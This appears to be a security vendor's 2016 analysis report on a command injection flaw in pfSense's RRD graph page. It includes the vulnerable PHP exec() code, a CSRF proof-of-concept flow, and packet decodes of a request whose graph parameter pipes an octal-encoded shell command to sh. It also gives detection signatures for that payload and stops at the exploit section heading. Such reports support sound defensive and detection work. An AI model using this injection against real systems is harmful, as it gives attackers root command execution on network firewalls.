Escolar Documentos
Profissional Documentos
Cultura Documentos
Revision 1.0
Revision History
Revision 1.0 2016-05-02
Table of Contents
1. Identity of Problem ................................................................................................................................ 3
1.1. Brief Description ......................................................................................................................... 3
1.2. CVE Reference .......................................................................................................................... 3
1.3. OSVDB Reference ..................................................................................................................... 3
1.4. Vendor Advisory ......................................................................................................................... 3
1.5. Discoverer Advisory .................................................................................................................... 3
1.6. Other Advisories ......................................................................................................................... 3
1.7. Notes ......................................................................................................................................... 3
1.8. Vulnerability Classification and Severity ....................................................................................... 3
2. Affected Products .................................................................................................................................. 5
2.1. Products Directly Affected by the Vulnerability .............................................................................. 5
2.2. Other Products Embedding the Vulnerable Product ...................................................................... 5
3. Problem Location .................................................................................................................................. 6
3.1. Program ..................................................................................................................................... 6
3.2. Function or Method .................................................................................................................... 6
3.3. Parameters ................................................................................................................................ 6
3.4. Data Objects .............................................................................................................................. 6
4. Problem Mechanism .............................................................................................................................. 7
4.1. Technical Mechanism ................................................................................................................. 7
4.2. Source Code Walkthrough .......................................................................................................... 7
4.3. Open Questions to Resolve ........................................................................................................ 8
5. Triggering the Problem .......................................................................................................................... 9
5.1. Prerequisites .............................................................................................................................. 9
5.2. Triggering Conditions .................................................................................................................. 9
5.3. Protocol Flow Diagram ............................................................................................................... 9
5.4. Attack Delivery ........................................................................................................................... 9
5.5. Packet Decodes ......................................................................................................................... 9
6. Attack Detection .................................................................................................................................. 15
6.1. Remote Detection of Generic Attacks ........................................................................................ 15
6.2. Remote Detection of Known Exploits ......................................................................................... 15
7. Exploit Reproduction ............................................................................................................................ 17
7.1. Exploit Overview ....................................................................................................................... 17
7.2. Exploit Code ............................................................................................................................. 17
8. Public Exploits ..................................................................................................................................... 18
8.1. Public Exploit [SA] .................................................................................................................... 18
9. Remediation Details ............................................................................................................................. 19
10. Related Research .............................................................................................................................. 20
11. Credits .............................................................................................................................................. 21
1. Identity of Problem
1.1. Brief Description
A Command Injection vulnerability has been reported in ESF pfSense. This vulnerability is due to
status_rrd_graph_img.php incorrectly validating the graph HTTP parameter.
A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the
status_rrd_graph_img.php URI. Remote unauthenticated attackers can leverage a CSRF vulnerability and entice
an authenticated user to exploit this vulnerability. Successful exploitation will result in arbitrary command execution
with root privileges.
Reference: https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
Reference: http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
1.7. Notes
Not available.
Reference: https://cwe.mitre.org/data/definitions/78.html
1.8.3. Severity
The severity classification of this vulnerability is high. This rating was determined through consideration of the
following factors:
2. Affected Products
2.1. Products Directly Affected by the Vulnerability
Electric Sheep Fencing pfSense prior to 2.3
3. Problem Location
3.1. Program
This vulnerable program is status_rrd_graph_img.php
3.3. Parameters
The vulnerable parameter is the HTTP parameter graph.
4. Problem Mechanism
4.1. Technical Mechanism
pfSense is a open source network firewall distribution based on the FreeBSD operating system. The distribution
creates a simple and intuitive WebGUI for configuring and managing a network firewall. Configuration is managed
either through the CLI or a web interface called the webConfigurator. The webConfigurator is a web application
capable of configuring and managing the firewall as well as other components of the pfSense distribution. All
interaction with the interface is performed via the HTTP protocol over port 80/TCP or securely over 443/TCP.
HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client
to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various
headers, an empty line, and an optional message body:
Request = Request-Line headers CRLF [message-body]
Request-Line = Method SP Request-URI SP HTTP-Version CRLF
Headers = *[Header]
Header = Field-Name ":" Field-Value CRLF
where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF). SP represents
a space character. Parameters can be passed from the client to the server as name-value pairs in either the
Request-URI, or in the message-body, depending on the Method used and Content-Type header. For example, a
simple HTTP request passing a parameter named "param" with value "1", using the GET method might look like:
GET /my_webapp/mypaget.htm?param=1 HTTP/1.1
Host: www.myhost.com
A corresponding HTTP request using the POST method might look like:
POST /my_webapp/mypaget.htm HTTP/1.1
Host: www.myhost.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
param=1
If there is more than one parameter/value pair, they are encoded as &-delimited name=value pairs:
var1=value1&var2=value2...
A command injection vulnerability exists in ESF pfSense. This vulnerability is due to status_rrd_graph_img.php
incorrectly sanitizing the graph HTTP parameter. Specifically, this PHP script fails to check for the pipe
"|" (ASCII:0x7C) and grave accent "`" (ASCII:0x60) characters. The graph parameter is then used to construct a
Shell command which is executed using the exec() function enabling less privileged users to inject arbitrary OS
commands.
A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the
status_rrd_graph_img.php URI. Remote unauthenticated attackers can leverage a CSRF vulnerability and entice
an authenticated user to exploit this vulnerability. Successful exploitation will result in arbitrary command execution
with root privileges.
if ($_GET['style']) {
$curstyle = $_GET['style'];
} else {
$curstyle = "inverse";
}
if (file_exists("$rrdtmppath$curdatabase-$curgraph.png")) {
if ((time() - filemtime("$rrdtmppath$curdatabase-$curgraph.png")) >= 15 ) {
if ($data) {
$_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn);
$graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd;
flush();
usleep(500);
}
}
} else {
if ($data) {
$_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn);
$graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd;
flush();
usleep(500);
}
}
The target user sends the crafted HTTP request to the target server:
[ Target User ] -----------------> [ Target Server ]
5.4.2. IP protocols
Not available.
5.4.4. Notes
Not applicable.
0000 00 50 56 bd 7f 60 00 50 56 bd e4 13 08 00 45 00 .PV..`.PV.....E.
0010 01 de 0e 5a 40 00 80 06 81 11 ac 10 08 ce ac 10 ...Z@...........
0020 08 c0 c0 c0 00 50 90 2b b3 5b fa 4d 4d 1a 50 18 .....P.+.[.MM.P.
0030 fa f0 f7 3c 00 00 47 45 54 20 2f 73 74 61 74 75 ...<..GET /statu
0040 73 5f 72 72 64 5f 67 72 61 70 68 5f 69 6d 67 2e s_rrd_graph_img.
0050 70 68 70 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f php HTTP/1.1..Ho
0060 73 74 3a 20 31 37 32 2e 31 36 2e 38 2e 31 39 32 st: 172.16.8.192
0070 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 ..Connection: ke
0080 65 70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 74 ep-alive..Accept
0090 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c : text/html,appl
00a0 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d ication/xhtml+xm
00b0 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d l,application/xm
00c0 6c 3b 71 3d 30 2e 39 2c 69 6d 61 67 65 2f 77 65 l;q=0.9,image/we
00d0 62 70 2c 2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 55 70 bp,*/*;q=0.8..Up
00e0 67 72 61 64 65 2d 49 6e 73 65 63 75 72 65 2d 52 grade-Insecure-R
00f0 65 71 75 65 73 74 73 3a 20 31 0d 0a 55 73 65 72 equests: 1..User
0100 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f -Agent: Mozilla/
0110 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 5.0 (Windows NT
0120 36 2e 31 29 20 41 70 70 6c 65 57 65 62 4b 69 74 6.1) AppleWebKit
0130 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 /537.36 (KHTML,
0140 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f like Gecko) Chro
0150 6d 65 2f 35 30 2e 30 2e 32 36 36 31 2e 37 35 20 me/50.0.2661.75
0160 53 61 66 61 72 69 2f 35 33 37 2e 33 36 0d 0a 41 Safari/537.36..A
0170 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 ccept-Encoding:
0180 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 2c 20 73 gzip, deflate, s
0190 64 63 68 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 dch..Accept-Lang
01a0 75 61 67 65 3a 20 65 6e 2d 55 53 2c 65 6e 3b 71 uage: en-US,en;q
01b0 3d 30 2e 38 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 =0.8..Cookie: PH
01c0 50 53 45 53 53 49 44 3d 33 35 65 64 65 65 33 32 PSESSID=35edee32
01d0 31 35 38 63 31 61 32 61 33 39 62 37 36 62 39 37 158c1a2a39b76b97
[...Truncated for readability...]
01e0 63 61 38 65 61 61 61 36 0d 0a 0d 0a ca8eaaa6....
Frame 6: 1514 bytes on wire (12112 bits), 1514 bytes captured (12112 bits)
Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
Internet Protocol Version 4, Src: 172.16.8.192 (172.16.8.192), Dst: 172.16.8.206 (172.16.8.206)
Transmission Control Protocol, Src Port: http (80), Dst Port: 49344 (49344), Seq: 1, Ack: 439, Len: 1460
Hypertext Transfer Protocol
HTTP/1.1 200 OK\r\n
Expires: Sat, 30 Apr 2016 20:31:34 GMT\r\n
Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n
Cache-Control: max-age=180000\r\n
Cache-Control: no-store, no-cache, must-revalidate\r\n
Cache-Control: post-check=0, pre-check=0\r\n
X-Frame-Options: SAMEORIGIN\r\n
Content-type: image/png\r\n
Last-Modified: Thu, 28 Apr 2016 18:31:35 GMT\r\n
Pragma: no-cache\r\n
Transfer-Encoding: chunked\r\n
Date: Thu, 28 Apr 2016 18:31:35 GMT\r\n
Server: lighttpd/1.4.38\r\n
\r\n
HTTP chunked response
0000 00 50 56 bd e4 13 00 50 56 bd 7f 60 08 00 45 00 .PV....PV..`..E.
0010 05 dc 46 7f 40 00 40 06 84 ee ac 10 08 c0 ac 10 ..F.@.@.........
0020 08 ce 00 50 c0 c0 fa 4d 4d 1a 90 2b b5 11 50 10 ...P...MM..+..P.
0030 ff ff 48 d5 00 00 48 54 54 50 2f 31 2e 31 20 32 ..H...HTTP/1.1 2
0040 30 30 20 4f 4b 0d 0a 45 78 70 69 72 65 73 3a 20 00 OK..Expires:
0050 53 61 74 2c 20 33 30 20 41 70 72 20 32 30 31 36 Sat, 30 Apr 2016
0060 20 32 30 3a 33 31 3a 33 34 20 47 4d 54 0d 0a 45 20:31:34 GMT..E
0070 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 32 36 20 xpires: Mon, 26
0080 4a 75 6c 20 31 39 39 37 20 30 35 3a 30 30 3a 30 Jul 1997 05:00:0
0090 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 0 GMT..Cache-Con
00a0 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 38 trol: max-age=18
00b0 30 30 30 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 0000..Cache-Cont
00c0 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e rol: no-store, n
00d0 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 o-cache, must-re
00e0 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d validate..Cache-
00f0 43 6f 6e 74 72 6f 6c 3a 20 70 6f 73 74 2d 63 68 Control: post-ch
0100 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b eck=0, pre-check
0110 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 =0..X-Frame-Opti
0120 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d ons: SAMEORIGIN.
0130 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 69 .Content-type: i
0140 6d 61 67 65 2f 70 6e 67 0d 0a 4c 61 73 74 2d 4d mage/png..Last-M
0150 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 38 odified: Thu, 28
0160 20 41 70 72 20 32 30 31 36 20 31 38 3a 33 31 3a Apr 2016 18:31:
0170 33 35 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 35 GMT..Pragma:
0180 6e 6f 2d 63 61 63 68 65 0d 0a 54 72 61 6e 73 66 no-cache..Transf
0190 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 er-Encoding: chu
01a0 6e 6b 65 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c nked..Date: Thu,
01b0 20 32 38 20 41 70 72 20 32 30 31 36 20 31 38 3a 28 Apr 2016 18:
01c0 33 31 3a 33 35 20 47 4d 54 0d 0a 53 65 72 76 65 31:35 GMT..Serve
01d0 72 3a 20 6c 69 67 68 74 74 70 64 2f 31 2e 34 2e r: lighttpd/1.4.
[...Truncated for readability...]
05c0 23 cc a2 45 8b 1a ea 4b c3 b8 dd e3 a9 6a bf aa #..E...K.....j..
05d0 dc c7 54 52 7a cc 98 31 e6 73 9f fb 9c 79 fa e9 ..TRz..1.s...y..
05e0 a7 33 ff 84 18 d7 c8 6f 66 9c .3.....of.
Frame 4: 444 bytes on wire (3552 bits), 444 bytes captured (3552 bits)
Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: HewlettP_f1:4a:7d (a0:d3:c1:f1:4a:7d)
Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.1.2 (172.16.1.2)
Transmission Control Protocol, Src Port: 49359 (49359), Dst Port: http (80), Seq: 1, Ack: 1, Len: 390
Hypertext Transfer Protocol
GET /~ssivakumaran/pfsense/poc.html HTTP/1.1\r\n
Host: 172.16.1.2\r\n
Connection: keep-alive\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n
Upgrade-Insecure-Requests: 1\r\n
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75
Safari/537.36\r\n
Accept-Encoding: gzip, deflate, sdch\r\n
Accept-Language: en-US,en;q=0.8\r\n
\r\n
0000 a0 d3 c1 f1 4a 7d 00 50 56 bd e4 13 08 00 45 00 ....J}.PV.....E.
0010 01 ae 11 45 40 00 80 06 86 14 ac 10 08 ce ac 10 ...E@...........
0020 01 02 c0 cf 00 50 d8 27 1e 87 d5 9a 57 c2 50 18 .....P.'....W.P.
0030 01 00 5e 3c 00 00 47 45 54 20 2f 7e 73 73 69 76 ..^<..GET /~ssiv
0040 61 6b 75 6d 61 72 61 6e 2f 70 66 73 65 6e 73 65 akumaran/pfsense
0050 2f 70 6f 63 2e 68 74 6d 6c 20 48 54 54 50 2f 31 /poc.html HTTP/1
0060 2e 31 0d 0a 48 6f 73 74 3a 20 31 37 32 2e 31 36 .1..Host: 172.16
0070 2e 31 2e 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e .1.2..Connection
0080 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 41 63 : keep-alive..Ac
0090 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c cept: text/html,
00a0 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d application/xhtm
00b0 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f l+xml,applicatio
00c0 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c 69 6d 61 67 n/xml;q=0.9,imag
00d0 65 2f 77 65 62 70 2c 2a 2f 2a 3b 71 3d 30 2e 38 e/webp,*/*;q=0.8
00e0 0d 0a 55 70 67 72 61 64 65 2d 49 6e 73 65 63 75 ..Upgrade-Insecu
00f0 72 65 2d 52 65 71 75 65 73 74 73 3a 20 31 0d 0a re-Requests: 1..
0100 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 User-Agent: Mozi
0110 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 lla/5.0 (Windows
0120 20 4e 54 20 36 2e 31 29 20 41 70 70 6c 65 57 65 NT 6.1) AppleWe
0130 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 bKit/537.36 (KHT
0000 00 50 56 bd e4 13 a0 d3 c1 f1 4a 7d 08 00 45 00 .PV.......J}..E.
0010 02 bf 01 69 40 00 40 06 d4 df ac 10 01 02 ac 10 ...i@.@.........
0020 08 ce 00 50 c0 cf d5 9a 57 c2 d8 27 20 0d 50 18 ...P....W..' .P.
0030 00 7b 93 ab 00 00 48 54 54 50 2f 31 2e 31 20 32 .{....HTTP/1.1 2
0040 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 00 OK..Date: Thu
0050 2c 20 32 38 20 41 70 72 20 32 30 31 36 20 31 38 , 28 Apr 2016 18
0060 3a 34 37 3a 31 32 20 47 4d 54 0d 0a 53 65 72 76 :47:12 GMT..Serv
0070 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 er: Apache/2.4.6
0080 20 28 43 65 6e 74 4f 53 29 20 4f 70 65 6e 53 53 (CentOS) OpenSS
0090 4c 2f 31 2e 30 2e 31 65 2d 66 69 70 73 20 50 48 L/1.0.1e-fips PH
00a0 50 2f 35 2e 34 2e 31 36 20 6d 6f 64 5f 77 73 67 P/5.4.16 mod_wsg
00b0 69 2f 33 2e 34 20 50 79 74 68 6f 6e 2f 32 2e 37 i/3.4 Python/2.7
00c0 2e 35 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 .5..Last-Modifie
00d0 64 3a 20 54 68 75 2c 20 32 38 20 41 70 72 20 32 d: Thu, 28 Apr 2
00e0 30 31 36 20 31 38 3a 33 31 3a 31 38 20 47 4d 54 016 18:31:18 GMT
00f0 0d 0a 45 54 61 67 3a 20 22 31 33 33 2d 35 33 31 ..ETag: "133-531
0100 38 66 62 62 36 62 61 31 33 30 22 0d 0a 41 63 63 8fbb6ba130"..Acc
0110 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 ept-Ranges: byte
0120 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 s..Content-Lengt
0130 68 3a 20 33 30 37 0d 0a 4b 65 65 70 2d 41 6c 69 h: 307..Keep-Ali
0140 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d ve: timeout=5, m
0150 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 ax=100..Connecti
0160 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a on: Keep-Alive..
0170 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 Content-Type: te
0180 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 xt/html; charset
0190 3d 55 54 46 2d 38 0d 0a 0d 0a 3c 68 74 6d 6c 3e =UTF-8....<html>
01a0 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 . <head>. <t
01b0 69 74 6c 65 3e 54 45 4c 55 53 20 53 65 63 75 72 itle>TELUS Secur
01c0 69 74 79 20 4c 61 62 73 20 50 6f 43 3c 2f 74 69 ity Labs PoC</ti
01d0 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 tle>. </head>.
[...Truncated for readability...]
02a0 68 6f 22 3e 43 6c 69 63 6b 20 68 65 72 65 20 66 ho">Click here f
02b0 6f 72 20 50 6f 43 3c 2f 61 3e 0a 20 20 3c 2f 62 or PoC</a>. </b
02c0 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a ody>.</html>.
HTTP/1.1\r\n
Host: 172.16.8.192\r\n
Connection: keep-alive\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n
Upgrade-Insecure-Requests: 1\r\n
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75
Safari/537.36\r\n
Referer: http://172.16.1.2/~ssivakumaran/pfsense/poc.html\r\n
Accept-Encoding: gzip, deflate, sdch\r\n
Accept-Language: en-US,en;q=0.8\r\n
Cookie: PHPSESSID=9ef619062013b1690743c6265f32a760\r\n
\r\n
0000 00 50 56 bd 7f 60 00 50 56 bd e4 13 08 00 45 00 .PV..`.PV.....E.
0010 02 9a 11 4c 40 00 80 06 7d 63 ac 10 08 ce ac 10 ...L@...}c......
0020 08 c0 c0 d0 00 50 b4 59 66 5b 16 f6 a6 e9 50 18 .....P.Yf[....P.
0030 01 00 3b 44 00 00 47 45 54 20 2f 73 74 61 74 75 ..;D..GET /statu
0040 73 5f 72 72 64 5f 67 72 61 70 68 5f 69 6d 67 2e s_rrd_graph_img.
0050 70 68 70 3f 64 61 74 61 62 61 73 65 3d 2d 74 68 php?database=-th
0060 72 6f 75 67 68 70 75 74 2e 72 72 64 26 67 72 61 roughput.rrd&gra
0070 70 68 3d 66 69 6c 65 7c 70 72 69 6e 74 66 25 32 ph=file|printf%2 << suspicious content
0080 30 5c 5c 31 36 34 5c 5c 31 35 37 5c 5c 31 36 35 0\\164\\157\\165
0090 5c 5c 31 34 33 5c 5c 31 35 30 5c 5c 30 34 30 5c \\143\\150\\040\
00a0 5c 30 35 37 5c 5c 31 36 34 5c 5c 31 35 35 5c 5c \057\\164\\155\\
00b0 31 36 30 5c 5c 30 35 37 5c 5c 31 36 34 5c 5c 31 160\\057\\164\\1
00c0 34 35 5c 5c 31 36 33 5c 5c 31 36 34 7c 73 68 7c 45\\163\\164|sh|
00d0 65 63 68 6f 20 48 54 54 50 2f 31 2e 31 0d 0a 48 echo HTTP/1.1..H
00e0 6f 73 74 3a 20 31 37 32 2e 31 36 2e 38 2e 31 39 ost: 172.16.8.19
00f0 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 2..Connection: k
0100 65 65 70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 eep-alive..Accep
0110 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 t: text/html,app
0120 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 lication/xhtml+x
0130 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 ml,application/x
0140 6d 6c 3b 71 3d 30 2e 39 2c 69 6d 61 67 65 2f 77 ml;q=0.9,image/w
0150 65 62 70 2c 2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 55 ebp,*/*;q=0.8..U
0160 70 67 72 61 64 65 2d 49 6e 73 65 63 75 72 65 2d pgrade-Insecure-
0170 52 65 71 75 65 73 74 73 3a 20 31 0d 0a 55 73 65 Requests: 1..Use
0180 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 r-Agent: Mozilla
0190 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 /5.0 (Windows NT
01a0 20 36 2e 31 29 20 41 70 70 6c 65 57 65 62 4b 69 6.1) AppleWebKi
01b0 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c t/537.36 (KHTML,
01c0 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 like Gecko) Chr
01d0 6f 6d 65 2f 35 30 2e 30 2e 32 36 36 31 2e 37 35 ome/50.0.2661.75
[...Truncated for readability...]
0280 53 49 44 3d 39 65 66 36 31 39 30 36 32 30 31 33 SID=9ef619062013
0290 62 31 36 39 30 37 34 33 63 36 32 36 35 66 33 32 b1690743c6265f32
02a0 61 37 36 30 0d 0a 0d 0a a760....
Frame 13: 667 bytes on wire (5336 bits), 667 bytes captured (5336 bits)
Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
Internet Protocol Version 4, Src: 172.16.8.192 (172.16.8.192), Dst: 172.16.8.206 (172.16.8.206)
Transmission Control Protocol, Src Port: http (80), Dst Port: 49360 (49360), Seq: 1, Ack: 627, Len: 613
Hypertext Transfer Protocol
HTTP/1.1 200 OK\r\n
Expires: Sat, 30 Apr 2016 20:48:52 GMT\r\n
Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n
Cache-Control: max-age=180000\r\n
Cache-Control: no-store, no-cache, must-revalidate\r\n
Cache-Control: post-check=0, pre-check=0\r\n
X-Frame-Options: SAMEORIGIN\r\n
Content-type: image/png\r\n
Last-Modified: Thu, 28 Apr 2016 18:48:52 GMT\r\n
Pragma: no-cache\r\n
Transfer-Encoding: chunked\r\n
Date: Thu, 28 Apr 2016 18:48:52 GMT\r\n
Server: lighttpd/1.4.38\r\n
\r\n
HTTP chunked response
Media Type
Media Type: image/png (175 bytes)
0020 08 ce 00 50 c0 d0 16 f6 a6 e9 b4 59 68 cd 50 18 ...P.......Yh.P.
0030 02 01 42 dc 00 00 48 54 54 50 2f 31 2e 31 20 32 ..B...HTTP/1.1 2
0040 30 30 20 4f 4b 0d 0a 45 78 70 69 72 65 73 3a 20 00 OK..Expires:
0050 53 61 74 2c 20 33 30 20 41 70 72 20 32 30 31 36 Sat, 30 Apr 2016
0060 20 32 30 3a 34 38 3a 35 32 20 47 4d 54 0d 0a 45 20:48:52 GMT..E
0070 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 32 36 20 xpires: Mon, 26
0080 4a 75 6c 20 31 39 39 37 20 30 35 3a 30 30 3a 30 Jul 1997 05:00:0
0090 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 0 GMT..Cache-Con
00a0 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 38 trol: max-age=18
00b0 30 30 30 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 0000..Cache-Cont
00c0 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e rol: no-store, n
00d0 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 o-cache, must-re
00e0 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d validate..Cache-
00f0 43 6f 6e 74 72 6f 6c 3a 20 70 6f 73 74 2d 63 68 Control: post-ch
0100 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b eck=0, pre-check
0110 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 =0..X-Frame-Opti
0120 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d ons: SAMEORIGIN.
0130 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 69 .Content-type: i
0140 6d 61 67 65 2f 70 6e 67 0d 0a 4c 61 73 74 2d 4d mage/png..Last-M
0150 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 38 odified: Thu, 28
0160 20 41 70 72 20 32 30 31 36 20 31 38 3a 34 38 3a Apr 2016 18:48:
0170 35 32 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 52 GMT..Pragma:
0180 6e 6f 2d 63 61 63 68 65 0d 0a 54 72 61 6e 73 66 no-cache..Transf
0190 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 er-Encoding: chu
01a0 6e 6b 65 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c nked..Date: Thu,
01b0 20 32 38 20 41 70 72 20 32 30 31 36 20 31 38 3a 28 Apr 2016 18:
01c0 34 38 3a 35 32 20 47 4d 54 0d 0a 53 65 72 76 65 48:52 GMT..Serve
01d0 72 3a 20 6c 69 67 68 74 74 70 64 2f 31 2e 34 2e r: lighttpd/1.4.
[...Truncated for readability...]
0260 20 69 6e 20 2f 75 73 72 2f 6c 6f 63 61 6c 2f 77 in /usr/local/w
0270 77 77 2f 73 74 61 74 75 73 5f 72 72 64 5f 67 72 ww/status_rrd_gr
0280 61 70 68 5f 69 6d 67 2e 70 68 70 20 6f 6e 20 6c aph_img.php on l
0290 69 6e 65 20 31 32 37 32 0a 0d 0a ine 1272...
6. Attack Detection
6.1. Remote Detection of Generic Attacks
pfSense enforces HTTPS by default. In order to detect a generic attack using this vulnerability, the detection
device must decrypt the HTTPS packets and monitor the HTTP traffic on ports mentioned in the section entitled
"Attack Delivery.
HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client
to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various
headers, an empty line, and an optional message body:
Request = Request-Line headers CRLF [message-body]
Request-Line = Method SP Request-URI SP HTTP-Version CRLF
Headers = *[Header]
Header = Field-Name ":" Field-Value CRLF
where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF). SP represents
a space character. Parameters can be passed from the client to the server as name-value pairs in either the
Request-URI or in the message-body depending on the Method used and Content-Type header. For example, a
simple HTTP request passing a parameter named "param" with value "1", using the GET method might look like:
GET /my_webapp/mypaget.htm?param=1 HTTP/1.1
Host: www.myhost.com
A corresponding HTTP request using the POST method might look like:
POST /my_webapp/mypaget.htm HTTP/1.1
Host: www.myhost.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
param=1
If there is more than one parameter/value pair, they are encoded as &-delimited name=value pairs:
var1=value1&var2=value2...
The detection device must look for HTTP requests to the following URI:
/status_rrd_graph_img.php
If a request to this URI is found, the detection device must analyze the value assigned to the request parameter
graph. If the value contains a pipe character "|" (or its case-insensitive URL-encoding, %7C), or the grave accent
"`" character (or in URL-encoded form, %60), then an attack exploiting this vulnerability is likely underway.
Note: All string matching described above must be done in a case-sensitive manner.
String 1:
\\145\\143\\150\\157
String 2:
\\160\\150\\160
String 3:
|
String 4:
status_rrd_graph_img.php
String 5:
graph=
If all of these strings are detected then an attack using the public exploit is likely underway.
7. Exploit Reproduction
7.1. Exploit Overview
